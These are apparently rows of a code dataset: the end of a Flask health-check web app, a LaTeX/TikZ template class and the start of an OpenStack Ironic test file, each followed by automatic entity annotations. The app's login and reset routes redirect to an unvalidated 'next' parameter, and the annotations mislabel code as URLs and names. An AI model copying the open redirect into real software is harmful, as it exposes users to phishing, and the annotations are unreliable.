return render_template('add.html')
if request.method == 'GET':
return render_template('add.html')
resource_type = request.form['resource_type']
tags = request.form.getlist('tags')
url = request.form['url'].strip()
resources_to_add = []
from healthcheck import sniff_test_resource, run_test_resource
sniffed_resources = sniff_test_resource(CONFIG, resource_type, url)
if not sniffed_resources:
msg = gettext("No resources detected")
LOGGER.exception()
flash(msg, 'danger')
for (resource_type, resource_url,
title, success, response_time,
message, start_time, resource_tags,) in sniffed_resources:
tags_to_add = []
for tag in chain(tags, resource_tags):
tag_obj = tag
if not isinstance(tag, Tag):
tag_obj = Tag.query.filter_by(name=tag).first()
if tag_obj is None:
tag_obj = Tag(name=tag)
tags_to_add.append(tag_obj)
resource_to_add = Resource(current_user,
resource_type,
title,
resource_url,
tags=tags_to_add)
resources_to_add.append(resource_to_add)
probe_to_add = None
checks_to_add = []
# Always add a default Probe and Check(s)
# from the GHC_PROBE_DEFAULTS conf
if resource_type in CONFIG['GHC_PROBE_DEFAULTS']:
resource_settings = CONFIG['GHC_PROBE_DEFAULTS'][resource_type]
probe_class = resource_settings['probe_class']
if probe_class:
# Add the default Probe
probe_obj = Factory.create_obj(probe_class)
probe_to_add = ProbeVars(
resource_to_add, probe_class,
probe_obj.get_default_parameter_values())
# Add optional default (parameterized)
# Checks to add to this Probe
checks_info = probe_obj.get_checks_info()
checks_param_info = probe_obj.get_plugin_vars()['CHECKS_AVAIL']
for check_class in checks_info:
check_param_info = checks_param_info[check_class]
if 'default' in checks_info[check_class]:
if checks_info[check_class]['default']:
# Filter out params for Check with fixed values
param_defs = check_param_info['PARAM_DEFS']
param_vals = {}
for param in param_defs:
if param_defs[param]['value']:
param_vals[param] = \
param_defs[param]['value']
check_vars = CheckVars(
probe_to_add, check_class, param_vals)
checks_to_add.append(check_vars)
result = run_test_resource(resource_to_add)
run_to_add = Run(resource_to_add, result)
DB.session.add(resource_to_add)
# prepopulate notifications for current user
resource_to_add.set_recipients('email', [g.user.email])
if probe_to_add:
DB.session.add(probe_to_add)
for check_to_add in checks_to_add:
DB.session.add(check_to_add)
DB.session.add(run_to_add)
try:
DB.session.commit()
msg = gettext('Services registered')
flash('%s (%s, %s)' % (msg, resource_type, url), 'success')
except Exception as err:
DB.session.rollback()
flash(str(err), 'danger')
return redirect(url_for('home', lang=g.current_lang))
if len(resources_to_add) == 1:
return edit_resource(resources_to_add[0].identifier)
return redirect(url_for('home', lang=g.current_lang))
@APP.route('/resource/<int:resource_identifier>/update', methods=['POST'])
@login_required
def update(resource_identifier):
"""update a resource"""
update_counter = 0
status = 'success'
try:
resource_identifier_dict = request.get_json()
resource = Resource.query.filter_by(
identifier=resource_identifier).first()
for key, value in resource_identifier_dict.items():
if key == 'tags':
resource_tags = [t.name for t in resource.tags]
tags_to_add = set(value) - set(resource_tags)
tags_to_delete = set(resource_tags) - set(value)
# Existing Tags: create relation else add new Tag
all_tag_objs = Tag.query.all()
for tag in tags_to_add:
tag_add_obj = None
for tag_obj in all_tag_objs:
if tag == tag_obj.name:
# use existing
tag_add_obj = tag_obj
break
if not tag_add_obj:
# add new
tag_add_obj = Tag(name=tag)
DB.session.add(tag_add_obj)
resource.tags.append(tag_add_obj)
for tag in tags_to_delete:
tag_to_delete = Tag.query.filter_by(name=tag).first()
resource.tags.remove(tag_to_delete)
update_counter += 1
elif key == 'probes':
# Remove all existing ProbeVars for Resource
for probe_var in resource.probe_vars:
resource.probe_vars.remove(probe_var)
# Add ProbeVars anew each with optional CheckVars
for probe in value:
LOGGER.info('adding Probe class=%s parms=%s' %
(probe['probe_class'], str(probe)))
probe_vars = ProbeVars(resource, probe['probe_class'],
probe['parameters'])
for check in probe['checks']:
check_vars = CheckVars(
probe_vars, check['check_class'],
check['parameters'])
probe_vars.check_vars.append(check_vars)
resource.probe_vars.append(probe_vars)
update_counter += 1
elif key == 'notify_emails':
resource.set_recipients('email',
[v for v in value if v.strip()])
elif key == 'notify_webhooks':
resource.set_recipients('webhook',
[v for v in value if v.strip()])
elif key == 'auth':
resource.auth = value
elif getattr(resource, key) != resource_identifier_dict[key]:
# Update other resource attrs, mainly 'name'
setattr(resource, key, resource_identifier_dict[key])
min_run_freq = CONFIG['GHC_MINIMAL_RUN_FREQUENCY_MINS']
if int(resource.run_frequency) < min_run_freq:
resource.run_frequency = min_run_freq
update_counter += 1
# Always update geo-IP: maybe failure on creation or
# IP-address of URL may have changed.
latitude, longitude = geocode(resource.url)
if latitude != 0.0 and longitude != 0.0:
# Only update for valid lat/lon
resource.latitude = latitude
resource.longitude = longitude
update_counter += 1
except Exception as err:
LOGGER.error("Cannot update resource: %s", err, exc_info=err)
DB.session.rollback()
status = str(err)
update_counter = 0
# finally:
# DB.session.close()
if update_counter > 0:
err = db_commit()
if err:
status = str(err)
return jsonify({'status': status})
@APP.route('/resource/<int:resource_identifier>/test', methods=['GET', 'POST'])
@login_required
def test(resource_identifier):
"""test a resource"""
resource = Resource.query.filter_by(identifier=resource_identifier).first()
if resource is None:
flash(gettext('Resource not found'), 'danger')
return redirect(request.referrer)
from healthcheck import run_test_resource
result = run_test_resource(
resource)
if request.method == 'GET':
if result.message == 'Skipped':
msg = gettext('INFO')
flash('%s: %s' % (msg, result.message), 'info')
elif result.message not in ['OK', None, 'None']:
msg = gettext('ERROR')
flash('%s: %s' % (msg, result.message), 'danger')
else:
flash(gettext('Resource tested successfully'), 'success')
return redirect(url_for('get_resource_by_id', lang=g.current_lang,
identifier=resource_identifier))
elif request.method == 'POST':
return jsonify(result.get_report())
@APP.route('/resource/<int:resource_identifier>/edit')
@login_required
def edit_resource(resource_identifier):
"""edit a resource"""
resource = Resource.query.filter_by(identifier=resource_identifier).first()
if resource is None:
flash(gettext('Resource not found'), 'danger')
return redirect(request.referrer)
probes_avail = views.get_probes_avail(resource.resource_type, resource)
suggestions = json.dumps(Recipient.get_suggestions('email',
g.user.username))
return render_template('edit_resource.html',
lang=g.current_lang,
resource=resource,
suggestions=suggestions,
auths_avail=ResourceAuth.get_auth_defs(),
probes_avail=probes_avail)
@APP.route('/resource/<int:resource_identifier>/delete')
@login_required
def delete(resource_identifier):
"""delete a resource"""
resource = Resource.query.filter_by(identifier=resource_identifier).first()
if g.user.role != 'admin' and g.user.username != resource.owner.username:
msg = gettext('You do not have access to delete this resource')
flash(msg, 'danger')
return redirect(url_for('get_resource_by_id', lang=g.current_lang,
identifier=resource_identifier))
if resource is None:
flash(gettext('Resource not found'), 'danger')
return redirect(url_for('home', lang=g.current_lang))
resource.clear_recipients()
DB.session.delete(resource)
try:
DB.session.commit()
flash(gettext('Resource deleted'), 'success')
return redirect(url_for('home', lang=g.current_lang))
except Exception as err:
DB.session.rollback()
flash(str(err), 'danger')
return redirect(url_for(request.referrer))
@APP.route('/probe/<string:probe_class>/<int:resource_identifier>/edit_form')
@APP.route('/probe/<string:probe_class>/edit_form')
@login_required
def get_probe_edit_form(probe_class, resource_identifier=None):
"""get the form to edit a Probe"""
probe_obj = Factory.create_obj(probe_class)
if resource_identifier:
resource = views.get_resource_by_id(resource_identifier)
if resource:
probe_obj._resource = resource
probe_obj.expand_params(resource)
probe_info = probe_obj.get_plugin_vars()
probe_vars = ProbeVars(
None, probe_class, probe_obj.get_default_parameter_values())
# Get only the default Checks for this Probe class
checks_avail = probe_obj.get_checks_info_defaults()
checks_avail = probe_obj.expand_check_vars(checks_avail)
for check_class in checks_avail:
check_obj = Factory.create_obj(check_class)
check_params = check_obj.get_default_parameter_values()
probe_check_param_defs = \
probe_info['CHECKS_AVAIL'][check_class]['PARAM_DEFS']
for param in probe_check_param_defs:
if 'value' in probe_check_param_defs[param]:
check_params[param] = probe_check_param_defs[param]['value']
# Appends 'check_vars' to 'probe_vars' (SQLAlchemy)
CheckVars(probe_vars, check_class, check_params)
return render_template('includes/probe_edit_form.html',
lang=g.current_lang,
probe=probe_vars, probe_info=probe_info)
@APP.route('/check/<string:check_class>/edit_form')
@login_required
def get_check_edit_form(check_class):
"""get the form to edit a Check"""
check_obj = Factory.create_obj(check_class)
check_info = check_obj.get_plugin_vars()
check_vars = CheckVars(
None, check_class, check_obj.get_default_parameter_values())
return render_template('includes/check_edit_form.html',
lang=g.current_lang,
check=check_vars, check_info=check_info)
@APP.route('/login', methods=['GET', 'POST'])
@public_route
def login():
"""login"""
if request.method == 'GET':
return render_template('login.html')
username = request.form['username']
password = request.form['password']
registered_user = User.query.filter_by(username=username).first()
authenticated = False
if registered_user:
# May not have upgraded to pw encryption: warn
if len(registered_user.password) < 80:
msg = 'Please upgrade GHC to encrypted passwords first, see docs!'
flash(gettext(msg), 'danger')
return redirect(url_for('login', lang=g.current_lang))
try:
authenticated = registered_user.authenticate(password)
finally:
pass
if not authenticated:
flash(gettext('Invalid username and / or password'), 'danger')
return redirect(url_for('login', lang=g.current_lang))
# Login ok
login_user(registered_user)
if 'next' in request.args:
return redirect(request.args.get('next'))
return redirect(url_for('home', lang=g.current_lang))
@APP.route('/logout')
def logout():
"""logout"""
logout_user()
flash(gettext('Logged out'), 'success')
if request.referrer:
return redirect(request.referrer)
else:
return redirect(url_for('home', lang=g.current_lang))
@APP.route('/reset_req', methods=['GET', 'POST'])
@public_route
def reset_req():
"""
Reset password request handling.
"""
if request.method == 'GET':
return render_template('reset_password_request.html')
# Reset request form with email
email = request.form['email']
registered_user = User.query.filter_by(email=email).first()
if registered_user is None:
LOGGER.warn('Invalid email for reset_req: %s' % email)
flash(gettext('Invalid email'), 'danger')
return redirect(url_for('reset_req', lang=g.current_lang))
# Generate reset url using user-specific token
token = registered_user.get_token()
reset_url = '%s/reset/%s' % (CONFIG['GHC_SITE_URL'], token)
# Create message body with reset link
msg_body = render_template('reset_password_email.txt',
lang=g.current_lang, config=CONFIG,
reset_url=reset_url,
username=registered_user.username)
try:
from email.mime.text import MIMEText
from email.utils import formataddr
msg = MIMEText(msg_body, 'plain', 'utf-8')
msg['From'] = formataddr((CONFIG['GHC_SITE_TITLE'],
CONFIG['GHC_ADMIN_EMAIL']))
msg['To'] = registered_user.email
msg['Subject'] = '[%s] %s' % (CONFIG['GHC_SITE_TITLE'],
gettext('reset password'))
from_addr = '%s <%s>' % (CONFIG['GHC_SITE_TITLE'],
CONFIG['GHC_ADMIN_EMAIL'])
to_addr = registered_user.email
msg_text = msg.as_string()
send_email(CONFIG['GHC_SMTP'], from_addr, to_addr, msg_text)
except Exception as err:
msg = 'Cannot send email. Contact admin: '
LOGGER.warn(msg + ' err=' + str(err))
flash(gettext(msg) + CONFIG['GHC_ADMIN_EMAIL'], 'danger')
return redirect(url_for('login', lang=g.current_lang))
flash(gettext('Password reset link sent via email'), 'success')
if 'next' in request.args:
return redirect(request.args.get('next'))
return redirect(url_for('home', lang=g.current_lang))
@APP.route('/reset/<token>', methods=['GET', 'POST'])
@public_route
def reset(token=None):
"""
Reset password submit form handling.
"""
# Must have at least a token to proceed.
if token is None:
return redirect(url_for('reset_req', lang=g.current_lang))
# Token received: verify if ok, may also time-out.
registered_user = User.verify_token(token)
if registered_user is None:
LOGGER.warn('Cannot find User from token: %s' % token)
flash(gettext('Invalid token'), 'danger')
return redirect(url_for('login', lang=g.current_lang))
# Token and user ok: return reset form.
if request.method == 'GET':
return render_template('reset_password_form.html')
# Valid token and user: change password from form-value
password = request.form['password']
if not password:
flash(gettext('Password required'), 'danger')
return redirect(url_for('reset/%s' % token, lang=g.current_lang))
registered_user.set_password(password)
DB.session.add(registered_user)
try:
DB.session.commit()
flash(gettext('Update password OK'), 'success')
except Exception as err:
msg = 'Update password failed!'
LOGGER.warn(msg + ' err=' + str(err))
DB.session.rollback()
flash(gettext(msg), 'danger')
# Finally redirect user to login page
return redirect(url_for('login', lang=g.current_lang))
#
# REST Interface Calls
#
@APP.route('/api/v1.0/summary')
@APP.route('/api/v1.0/summary/')
@APP.route('/api/v1.0/summary.<content_type>')
def api_summary(content_type='json'):
"""
Get health summary for all Resources within this instance.
"""
health_summary = views.get_health_summary()
# Convert Runs to dict-like structure
for run in ['first_run', 'last_run']:
run_obj = health_summary.get(run, None)
if run_obj:
health_summary[run] = run_obj.for_json()
# Convert Resources failing to dict-like structure
failed_resources = []
for resource in health_summary['failed_resources']:
failed_resources.append(resource.for_json())
health_summary['failed_resources'] = failed_resources
if content_type == 'json':
result = jsonify(health_summary)
else:
result = '<pre>\n%s\n</pre>' % \
render_template('status_report_email.txt',
lang=g.current_lang, summary=health_summary)
return result
@APP.route('/api/v1.0/probes-avail/')
@APP.route('/api/v1.0/probes-avail/<resource_type>')
@APP.route('/api/v1.0/probes-avail/<resource_type>/<int:resource_id>')
def api_probes_avail(resource_type=None, resource_id=None):
"""
Get available (configured) Probes for this
installation, optional for resource type
"""
resource = None
if resource_id:
resource = views.get_resource_by_id(resource_id)
probes = views.get_probes_avail(resource_type=resource_type,
resource=resource)
return jsonify(probes)
@APP.route('/api/v1.0/runs/<int:resource_id>')
@APP.route('/api/v1.0/runs/<int:resource_id>.<content_type>')
@APP.route('/api/v1.0/runs/<int:resource_id>/<int:run_id>')
@APP.route('/api/v1.0/runs/<int:resource_id>/<int:run_id>.<content_type>')
def api_runs(resource_id, run_id=None, content_type='json'):
"""
Get Runs (History of results) for Resource.
"""
if run_id:
runs = [views.get_run_by_id(run_id)]
else:
runs = views.get_run_by_resource_id(resource_id)
run_arr = []
for run in runs:
run_dict = {
'id': run.identifier,
'success': run.success,
'response_time': run.response_time,
'checked_datetime': run.checked_datetime,
'message': run.message,
'report': run.report
}
run_arr.append(run_dict)
runs_dict = {'total': len(run_arr), 'runs': run_arr}
result = 'unknown'
if content_type == 'json':
result = jsonify(runs_dict)
elif content_type == 'html':
result = render_template('includes/runs.html',
lang=g.current_lang, runs=runs_dict['runs'])
return result
if __name__ == '__main__': # run locally, for fun
import sys
HOST = '127.0.0.1'
PORT = 8000
if len(sys.argv) > 1:
HOST, PORT = sys.argv[1].split(':')
APP.run(host=HOST, port=int(PORT), use_reloader=True, debug=True)
| 38,819 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Tom Kralidis dummy@email.com'], ['PERSON', 'Just van den Broecke'], ['DATE_TIME', '2014'], ['PERSON', 'Tom Kralidis'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['LOCATION', 'jsonify'], ['NRP', 'German'], ['LOCATION', 'Español'], ['LOCATION', 'Bolivia'], ['NRP', 'Croatian'], ['LOCATION', 'Croatia'], ['URL', 'request.sc'], ['URL', 'request.pa'], ['URL', 'request.sc'], ['URL', 'request.pa'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'MANAGER.re'], ['PERSON', 'TODO'], ['PERSON', 'RESOURCE_TYPES'], ['URL', 'rule.ru'], ['URL', 'r.id'], ['URL', 'r.fi'], ['URL', 'rule.ru'], ['URL', 'r.id'], ['URL', 'r.fi'], ['URL', 'r.la'], ['PERSON', "history_csv = '"], ['URL', 'resource.id'], ['PERSON', 'history_json'], ['URL', 'resource.id'], ['PERSON', 'json'], ['URL', 'rule.ru'], ['URL', 'resource.la'], ['URL', 'resource.re'], ['URL', 'rule.ru'], ['URL', 'resource.re'], ['URL', 'resource.owner.us'], ['PERSON', 'json'], ['URL', 'rule.ru'], ['URL', 'run.re'], ['URL', 'rule.ru'], ['URL', 'run.re'], ['PERSON', "methods=['GET"], ['LOCATION', 'msg2'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['PERSON', "methods=['GET"], ['URL', 'request.fo'], ['LOCATION', 'chain(tags'], ['PERSON', 'checks_param_info'], ['LOCATION', 'check_class'], ['LOCATION', 'check_class'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['LOCATION', 'tag_obj'], ['PERSON', "methods=['GET"], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['PERSON', "gettext('You"], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'resource.cl'], ['PERSON', 'DB.session.delete(resource'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'request.re'], ['URL', 'APP.ro'], ['LOCATION', 'get_probe_edit_form(probe_class'], ['PERSON', 'Factory.create_obj(check_class'], ['PERSON', 'probe_check_param_defs = \\'], ['LOCATION', 'CheckVars(probe_vars'], ['LOCATION', 'check_class'], ['LOCATION', 'lang=g.current_lang'], ['PERSON', 'check_info ='], ['LOCATION', 'check_class'], ['LOCATION', 'lang=g.current_lang'], ['PERSON', 'check_info=check_info)\n\n\n'], ['PERSON', "methods=['GET"], ['DATE_TIME', 'May'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['PERSON', "methods=['GET"], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['PERSON', 'lang=g.current_lang'], ['URL', 'user.us'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'request.ar'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['PERSON', "methods=['GET"], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['PERSON', 'failed_resources.append(resource.for_json'], ['PERSON', 'lang=g.current_lang'], ['PERSON', 'lang=g.current_lang'], ['URL', 'https://flask-login.readthedocs.io'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'logging.ge'], ['URL', 'App.ge'], ['URL', 'App.ge'], ['URL', 'App.ge'], ['URL', 'App.ge'], ['URL', 'MANAGER.in'], ['URL', 'LOGGER.in'], ['URL', 'LOGGER.in'], ['URL', 'DB.session.com'], ['URL', 'DB.session.ro'], ['URL', 'DB.session.cl'], ['URL', 'APP.be'], ['URL', 'g.us'], ['URL', 'request.ar'], ['URL', 'request.ar'], ['URL', 'request.ar'], ['URL', 'g.cu'], ['URL', 'request.ar'], ['URL', 'g.cu'], ['URL', 'request.pa'], ['URL', 'request.pa'], ['URL', 'g.user.is'], ['URL', 'APP.vi'], ['URL', 'function.is'], ['URL', 'DB.session.re'], ['URL', 'g.ge'], ['URL', 'request.ac'], ['URL', 'languages.be'], ['URL', 'LANGUAGES.ke'], ['URL', 'MANAGER.us'], ['URL', 'User.query.ge'], ['URL', 'request.headers.ge'], ['URL', 'val.re'], ['URL', 'User.query.fi'], ['URL', 'user.au'], ['URL', 'APP.co'], ['URL', 'views.ge'], ['URL', 'views.ge'], ['URL', 'tags.ke'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'home.ht'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'request.args.ge'], ['URL', 'TYPES.ke'], ['URL', 'request.ar'], ['URL', 'request.args.ge'], ['URL', 'views.li'], ['URL', 'r.la'], ['URL', 'r.la'], ['URL', 'run.re'], ['URL', 'r.re'], ['URL', 'r.la'], ['URL', 'r.la'], ['URL', 'r.ma'], ['URL', 'r.re'], ['URL', 'r.id'], ['URL', 'r.re'], ['URL', 'r.la'], ['URL', 'r.ma'], ['URL', 'r.re'], ['URL', 'r.id'], ['URL', 'output.ge'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'resource.la'], ['URL', 'run.re'], ['URL', 'resource.id'], ['URL', 'resource.owner.us'], ['URL', 'resource.ma'], ['URL', 'resource.re'], ['URL', 'resource.la'], ['URL', 'resource.fi'], ['URL', 'resource.la'], ['URL', 'resource.id'], ['URL', 'resource.ma'], ['URL', 'resource.re'], ['URL', 'resource.la'], ['URL', 'resource.fi'], ['URL', 'resource.la'], ['URL', 'output.ge'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'resource.ru'], ['URL', 'resource.owner.us'], ['URL', 'resource.re'], ['URL', 'resource.ru'], ['URL', 'resource.owner.us'], ['URL', 'resource.re'], ['URL', 'output.ge'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'request.args.ge'], ['URL', 'TYPES.ke'], ['URL', 'request.ar'], ['URL', 'request.args.ge'], ['URL', 'request.args.ge'], ['URL', 'views.li'], ['URL', 'resources.ht'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'resource.ht'], ['URL', 'APP.ro'], ['URL', 'register.ht'], ['URL', 'request.me'], ['URL', 'register.ht'], ['URL', 'User.query.fi'], ['URL', 'request.fo'], ['URL', 'User.query.fi'], ['URL', 'request.fo'], ['URL', 'register.ht'], ['URL', 'request.fo'], ['URL', 'request.fo'], ['URL', 'request.fo'], ['URL', 'DB.session.ad'], ['URL', 'DB.session.com'], ['URL', 'DB.session.ro'], ['URL', 'err.me'], ['URL', 'request.fo'], ['URL', 'g.user.is'], ['URL', 'add.ht'], ['URL', 'request.me'], ['URL', 'add.ht'], ['URL', 'request.fo'], ['URL', 'request.form.ge'], ['URL', 'Tag.query.fi'], ['URL', 'Factory.cr'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'DB.session.ad'], ['URL', 'add.se'], ['URL', 'g.us'], ['URL', 'DB.session.ad'], ['URL', 'DB.session.ad'], ['URL', 'DB.session.ad'], ['URL', 'DB.session.com'], ['URL', 'DB.session.ro'], ['URL', 'request.ge'], ['URL', 'Resource.query.fi'], ['URL', 'dict.it'], ['URL', 't.na'], ['URL', 'Tag.query.al'], ['URL', 'obj.na'], ['URL', 'DB.session.ad'], ['URL', 'Tag.query.fi'], ['URL', 'resource.tags.re'], ['URL', 'resource.pro'], ['URL', 'resource.pro'], ['URL', 'vars.re'], ['URL', 'LOGGER.in'], ['URL', 'vars.ch'], ['URL', 'resource.pro'], ['URL', 'resource.se'], ['URL', 'v.st'], ['URL', 'resource.se'], ['URL', 'v.st'], ['URL', 'resource.au'], ['URL', 'resource.ru'], ['URL', 'resource.ru'], ['URL', 'resource.la'], ['URL', 'LOGGER.er'], ['URL', 'DB.session.ro'], ['URL', 'DB.session.cl'], ['URL', 'APP.ro'], ['URL', 'Resource.query.fi'], ['URL', 'request.re'], ['URL', 'request.me'], ['URL', 'result.me'], ['URL', 'result.me'], ['URL', 'result.me'], ['URL', 'result.me'], ['URL', 'request.me'], ['URL', 'result.ge'], ['URL', 'APP.ro'], ['URL', 'Resource.query.fi'], ['URL', 'request.re'], ['URL', 'views.ge'], ['URL', 'resource.re'], ['URL', 'Recipient.ge'], ['URL', 'g.user.us'], ['URL', 'resource.ht'], ['URL', 'g.cu'], ['URL', 'ResourceAuth.ge'], ['URL', 'APP.ro'], ['URL', 'Resource.query.fi'], ['URL', 'g.user.ro'], ['URL', 'g.user.us'], ['URL', 'resource.owner.us'], ['URL', 'DB.session.de'], ['URL', 'DB.session.com'], ['URL', 'DB.session.ro'], ['URL', 'APP.ro'], ['URL', 'Factory.cr'], ['URL', 'views.ge'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'Factory.cr'], ['URL', 'obj.ge'], ['URL', 'form.ht'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['URL', 'Factory.cr'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'form.ht'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['URL', 'request.me'], ['URL', 'login.ht'], ['URL', 'request.fo'], ['URL', 'request.fo'], ['URL', 'User.query.fi'], ['URL', 'user.pa'], ['URL', 'user.au'], ['URL', 'request.ar'], ['URL', 'request.args.ge'], ['URL', 'request.re'], ['URL', 'request.re'], ['URL', 'request.me'], ['URL', 'request.ht'], ['URL', 'request.fo'], ['URL', 'User.query.fi'], ['URL', 'user.ge'], ['URL', 'g.cu'], ['URL', 'msg.as'], ['URL', 'request.args.ge'], ['URL', 'User.ve'], ['URL', 'request.me'], ['URL', 'form.ht'], ['URL', 'request.fo'], ['URL', 'user.se'], ['URL', 'DB.session.ad'], ['URL', 'DB.session.com'], ['URL', 'DB.session.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'summary.ge'], ['URL', 'obj.fo'], ['URL', 'resource.fo'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'views.ge'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'views.ge'], ['URL', 'run.id'], ['URL', 'run.su'], ['URL', 'run.re'], ['URL', 'run.ch'], ['URL', 'run.me'], ['URL', 'run.re'], ['URL', 'runs.ht'], ['URL', 'g.cu'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'APP.ru']] |
32 | # Copyright 2012 (C) Mickael Menu dummy@email.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
from string import Template
from .tags import *
class FileTemplate(object):
"""
The file template tool generates a full LaTeX/TikZ source from a template, preamble
and source.
"""
def __init__(self, template, preamble, source):
assert preamble is not None and source is not None
super(FileTemplate, self).__init__()
self.content = ""
self.preamble = preamble
self.source = source
self.latex_template = Template(template)
def buildFileContent(self):
"""
Builds the TikZ document with given preamble and source and the document template.
"""
self._buildPreambleChunk()
self._buildSourceChunk()
self._buildContentFromTemplate()
return self.content
def _buildPreambleChunk(self):
self.preamble = "%s\n%s\n%s\n" % (PREAMBLE_BEGIN_TAG, self.preamble, PREAMBLE_END_TAG)
def _buildSourceChunk(self):
self.source = "%s\n%s\n%s\n" % (SOURCE_BEGIN_TAG, self.source, SOURCE_END_TAG)
def _buildContentFromTemplate(self):
self.content = TIKZ_TAG + "\n"
self.content += self.latex_template.safe_substitute(PREAMBLE=self.preamble, SOURCE=self.source)
| 1,771 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'SOURCE_BEGIN_TAG'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'self.co'], ['URL', 'self.pr'], ['URL', 'self.so'], ['URL', 'self.la'], ['URL', 'self.co'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'self.so'], ['URL', 'self.so'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'template.sa'], ['URL', 'self.pr'], ['URL', 'self.so']] |
33 | # Copyright (c) 2012 NTT DOCOMO, INC.
# Copyright 2011 OpenStack Foundation
# Copyright 2011 Ilya Alekseyev
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import gzip
import os
import shutil
import stat
import tempfile
import time
import types
import mock
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_utils import uuidutils
import requests
import testtools
from ironic.common import boot_devices
from ironic.common import disk_partitioner
from ironic.common import exception
from ironic.common import images
from ironic.common import states
from ironic.common import utils as common_utils
from ironic.conductor import task_manager
from ironic.conductor import utils as manager_utils
from ironic.drivers.modules import agent_client
from ironic.drivers.modules import deploy_utils as utils
from ironic.drivers.modules import image_cache
from ironic.tests import base as tests_base
from ironic.tests.conductor import utils as mgr_utils
from ironic.tests.db import base as db_base
from ironic.tests.db import utils as db_utils
from ironic.tests.objects import utils as obj_utils
_PXECONF_DEPLOY = b"""
default deploy
label deploy
kernel deploy_kernel
append initrd=deploy_ramdisk
ipappend 3
label boot_partition
kernel kernel
append initrd=ramdisk root={{ ROOT }}
label boot_whole_disk
COM32 chain.c32
append mbr:{{ DISK_IDENTIFIER }}
"""
_PXECONF_BOOT_PARTITION = """
default boot_partition
label deploy
kernel deploy_kernel
append initrd=deploy_ramdisk
ipappend 3
label boot_partition
kernel kernel
append initrd=ramdisk root=UUID=12345678-1234-1234-1234-1234567890abcdef
label boot_whole_disk
COM32 chain.c32
append mbr:{{ DISK_IDENTIFIER }}
"""
_PXECONF_BOOT_WHOLE_DISK = """
default boot_whole_disk
label deploy
kernel deploy_kernel
append initrd=deploy_ramdisk
ipappend 3
label boot_partition
kernel kernel
append initrd=ramdisk root={{ ROOT }}
label boot_whole_disk
COM32 chain.c32
append mbr:0x12345678
"""
_IPXECONF_DEPLOY = b"""
#!ipxe
dhcp
goto deploy
:deploy
kernel deploy_kernel
initrd deploy_ramdisk
boot
:boot_partition
kernel kernel
append initrd=ramdisk root={{ ROOT }}
boot
